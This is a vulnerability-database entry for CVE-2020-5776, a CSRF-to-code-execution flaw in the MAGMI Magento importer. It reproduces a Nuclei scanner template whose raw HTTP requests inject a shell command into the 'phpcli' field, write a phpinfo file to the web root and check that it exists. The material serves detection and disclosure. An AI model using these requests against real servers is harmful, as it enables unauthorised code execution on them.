Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-5776
HistorySep 04, 2020 - 1:19 p.m.

MAGMI - Cross-Site Request Forgery

2020-09-0413:19:13
ProjectDiscovery
github.com
4

0.426 Medium

EPSS

Percentile

97.3%

MAGMI (Magento Mass Importer) is vulnerable to cross-site request forgery (CSRF) due to a lack of CSRF tokens. Remote code execution (via phpcli command) is also possible in the event that CSRF is leveraged against an existing admin session.

id: CVE-2020-5776

info:
  name: MAGMI - Cross-Site Request Forgery
  author: dwisiswant0
  severity: high
  description: MAGMI (Magento Mass Importer) is vulnerable to cross-site request forgery (CSRF) due to a lack of CSRF tokens. Remote code execution (via phpcli command) is also possible in the event that CSRF is leveraged against an existing admin session.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to perform unauthorized actions on behalf of the victim user.
  remediation: |
    Implement CSRF protection mechanisms such as anti-CSRF tokens and referer validation.
  reference:
    - https://www.tenable.com/security/research/tra-2020-51
    - https://nvd.nist.gov/vuln/detail/CVE-2020-5776
    - https://github.com/sobinge/nuclei-templates
    - https://github.com/404notf0und/CVE-Flow
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2020-5776
    cwe-id: CWE-352
    epss-score: 0.50353
    epss-percentile: 0.97455
    cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: magmi_project
    product: magmi
    shodan-query: http.component:"Magento"
  tags: cve,cve2020,magmi,magento,tenable,magmi_project

http:
  - raw:
      - |
        POST /magmi/web/magmi_saveprofile.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Connection: close

        profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=
      - |
        POST /magmi/web/magmi_run.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Connection: close

        engine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update
      - |
        GET /magmi/web/info.php HTTP/1.1
        Host: {{Hostname}}
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100bc2cf16817aaf1a4a28dcbcf80d5270dbe106cb819d27317b9f79a25d3ed01ad0221008c5b95bbb48cd9e491c881d690b92f104be04131ceca40463cb7f8093460f434:922c64590222798bb761d5b6d8e72950

0.426 Medium

EPSS

Percentile

97.3%